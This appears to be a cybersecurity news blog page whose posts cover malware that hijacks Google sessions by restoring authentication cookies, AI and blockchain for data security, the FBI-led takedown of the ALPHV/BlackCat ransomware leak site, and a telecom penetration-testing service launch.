Hackers Find a Way to Gain Password-Free Access to Google Accounts


Cybercriminals find new ways to access Google accounts

Cybersecurity researchers have found a way for hackers to access the Google accounts of victims without using the victims' passwords.

According to a research, hackers are already actively testing a potentially harmful type of malware that exploits third-party cookies to obtain unauthorized access to people's personal information.

When a hacker shared information about the attack in a Telegram channel, it was first made public in October 2023.

The cookie exploit

The post explained how cookies, which websites and browsers employ to follow users and improve their efficiency and usability, could be vulnerable and lead to account compromise.

Users can access their accounts without continuously entering their login credentials thanks to Google authentication cookies, but the hackers discovered a way of restoring these cookies to evade two-factor authentication.

What has Google said?

With a market share of over 60% last year, Google Chrome is the most popular web browser in the world. Currently, the browser is taking aggressive measures to block third-party cookies.

Google said “We routinely upgrade our defenses against such techniques and to secure users who fall victim to malware. In this instance, Google has taken action to secure any compromised accounts detected.” “Users should continually take steps to remove any malware from their computer, and we recommend turning on Enhanced Safe Browsing in Chrome to protect against phishing and malware downloads.”

What's next?

Cybersecurity experts who first found the threat said it “underscores the complexity and stealth” of modern cyber attacks.”

The security flaw was described by intelligence researcher Pavan Karthick M. titled "Compromising Google accounts: Malware exploiting undocumented OAuth2 functionality for session hijacking."

Karthick M further stated that in order to keep ahead of new cyber threats, technical vulnerabilities and human intelligence sources must be continuously monitored. 

“This analysis underscores the complexity and stealth of modern cyber threats. It highlights the necessity for continuous monitoring of both technical vulnerabilities and human intelligence sources to stay ahead of emerging cyber threats. The collaboration of technical and human intelligence is crucial in uncovering and understanding sophisticated exploits like the one analyzed in this report,” says the blog post. 



Read more »
Threat Intelligence
AI-Blockchain Blockchain Technology Data Safety Technology Threat Intelligence

Integrating the Power of AI and Blockchain for Data Security and Transparency

 

In an ever-changing digital landscape, providing strong data security and transparency has become critical. This article explores the dynamic interaction of two transformational technologies: artificial intelligence (AI) and blockchain. 

AI improves data security

Artificial intelligence (AI) is critical for enhancing data security via advanced technology and proactive techniques. Machine learning techniques offer real-time threat detection by recognising patterns and abnormalities that indicate potential security breaches. Predictive analytics assesses and anticipates threats, enabling proactive intervention. Furthermore, AI-driven anomaly detection improves the ability to quickly identify and respond to emerging security concerns. 

Blockchain, a transformational force, enables unparalleled data transparency. Its decentralised and irreversible ledger structure means that once data is recorded, it cannot be changed or tampered with, instilling trust in information integrity. Smart contracts, a critical component of blockchain technology, automate and transparently implement established rules, hence improving overall data governance. Blockchain provides a safe and transparent framework, making it an effective solution for industries looking to establish trust, traceability, and accountability inside their data ecosystems.

Synergies in AI and blockchain

The synergies between AI and Blockchain form a potent combination, tackling an array of data security and transparency concerns. AI's analytical capabilities strengthen blockchain functionality by allowing for advanced data analytics on a decentralised ledger. AI-powered algorithms help to detect trends, anomalies, and potential security threats within the blockchain network, hence strengthening overall security measures. Furthermore, AI-driven verification methods improve the accuracy and dependability of blockchain-stored data, increasing trustworthiness and transparency of information. This collaborative integration enables a more resilient and efficient approach to overseeing and safeguarding data in the digital era. 

Managing the integration of AI with Blockchain poses a number of issues and considerations. Ethical issues arise as AI algorithms make decisions, requiring evaluation to mitigate biases and ensure equality. Scalability concerns exist in blockchain networks, mandating solutions for increased transaction volume. Regulatory issues and compliance standards pose challenges, requiring a balance between innovation and adherence to legal frameworks.

The prospects for using blockchain technology and artificial intelligence (AI) to improve data security and transparency seem promising. As technology advances, it will probably enhance the complementary effects of these two revolutionary forces, increasing the limits of what is possible.

Challenges with integration 

Blockchain and AI integration is not without obstacles, though. As AI systems make decisions, ethical issues surface, requiring constant oversight to avoid prejudices and ensure fairness. Blockchain networks continue to face scalability issues, requiring solutions for increasing transaction volumes. Another level of complexity is added by regulatory compliance, which necessitates a careful balancing act between innovation and legal framework compliance. 

The future of AI and Blockchain in terms of data security and transparency is bright, notwithstanding these obstacles. It is likely that constant development will enhance the synergy between these revolutionary technologies, expanding the limits of what is feasible.
Read more »
Threat Intelligence
Cyber Security Dark Web leak sites Law Enforcement Ransomware Gang Threat Intelligence

International Authorities Take Down ALPHV ransomware Gang’s Dark Web Leak Site

 

An international group of law enforcement groups has taken down the dark web leak site of the notorious ransomware gang known as ALPHV, or BlackCat. 

"The Federal Bureau of Investigation seized this site as part of a coordinated law enforcement action taken against ALPHV Blackcat Ransomware," a message currently reads on the gang's dark web leak site. 

According to the press release, law enforcement agencies from the United Kingdom, Denmark, Germany, Spain, and Australia were also involved in the takedown operation. 

The US Department of Justice later confirmed the disruption, stating that the global takedown effort, led by the FBI, allowed US officials to obtain visibility into the ransomware group's computer and seize "several websites" that ALPHV operated. 

Additionally, the FBI released a decryption tool that has already assisted over 500 victims of the ALPHV ransomware patch their systems. (The number of victims is 400 according to the government's search warrant.) The tool assisted several victims in the US and prevented them from having to pay ransom demands that came to around $68 million. 

According to the government's notification, ALPHV stole hundreds of millions of dollars by breaking into the networks of over a thousand victims worldwide. The gang has targeted vital infrastructure in the United States, including government structures, emergency services, defence industrial base companies, critical manufacturing, healthcare and public health facilities, and other businesses, educational institutions, and governmental entities. 

The FBI said it worked with a “confidential human source” linked to the ransomware gang, which granted agents access to the ALPHV/BlackCat affiliate panel that the gang used to manage its victims, according to the government's search warrant. The State Department previously stated that it will reward those who offer insights "about Blackcat, their affiliates, or activities.” 

“In disrupting the BlackCat ransomware group, the Justice Department has once again hacked the hackers,” stated U.S. deputy attorney general Lisa Monaco in remarks. “With a decryption tool provided by the FBI to hundreds of ransomware victims worldwide, businesses and schools were able to reopen, and healthcare and emergency services were able to come back online. We will continue to prioritize disruptions and place victims at the center of our strategy to dismantle the ecosystem fueling cybercrime.” 

In recent years, the ALPHV/BlackCat ransomware group has been one of the most active and devastating. ALPHV, which is believed to be a successor to the now-defunct sanctioned REvil hacking gang, claims to have infiltrated a number of high-profile victims, including news-sharing site Reddit, healthcare provider Norton, and the United Kingdom's Barts Health NHS Trust. 

The group's tactics have become more violent in recent months. The ALPHV filed a first-of-its-kind complaint with the U.S. Securities and Exchange Commission (SEC) in November, alleging that digital lending provider MeridianLink failed to disclose "a significant breach compromising customer data and operational information," which the gang claimed responsibility for.
Read more »
Threat Intelligence
Cellular Network Cyber Threats Technology Telecom Sector Threat Intelligence

HackersEra Launches Telecom Penetration Testing to Eliminate Cyber Threats

 

Cybercriminals have attacked telecom infrastructure, particularly as it shifts to an IP-based design with the introduction of Long-Term Evolution (LTE) networks, also referred to as LTE or 4G. Persistent attackers could spy on users' cellular networks and record data flow by exploiting security vulnerabilities in the LTE mobile device standard. 

Thanks to HackersEra, a prominent Indian cybersecurity service provider with global footprints, for introducing a cutting-edge solution to help the telecom sector in India and around the world enhance their telecom network security posture, minimise the risk of attacks, and increase operational efficiency through 'Telecom Penetration Testing.’ 

The telecom industry has grown at an astounding rate, especially in the developing world of South America, Africa, and Asia. As a result, networks have grown significantly, new services have been added, and the system as a whole has grown increasingly complicated. But security is frequently ignored or marginalised in favour of growing market share and cutting expenses. But hackers don't care about the economy, and they've begun targeting telecom infrastructure since it's using LTE to enable the move to an IP-based design. 

This, combined with stronger telecom security laws, continues to be a formidable barrier for carriers to overcome. Despite the fact that there are several security challenges, telcos' experiences have shown that some of them can be resolved, while others will continue to be a known threat unless cost-effective solutions are devised. 

HackersEra covers every angle while assessing the security of a telecom infrastructure. The company's strategy for boosting operational efficiency in the telecom industry includes pre-engagement, scoping, asset classification, risk assessment and risk treatment, vulnerability analysis, penetration testing, employee training, and support.

HackersEra is home to a team of researchers who are experts in the latest developments in telecommunications technology, such as 2G, 3G, 4G, and 5G. These tools have probed and investigated telecom network interfaces such as the Air Interface, Backhaul Interface, Core Network, and Roaming Interface. The company has developed security testing automation solutions that specialists with less security experience can use. 

The company was launched in 2015 in Maharashtra's Pune by Vikash Chaudhary, is an industry-leading cybersecurity service provider known for introducing innovative, adaptive business processes that provide increased security and productivity to enterprises. In just seven years after its inception, the group has developed globally, particularly in Asia, the Americas, and Africa.
Read more »
Subscribe to: Posts (Atom)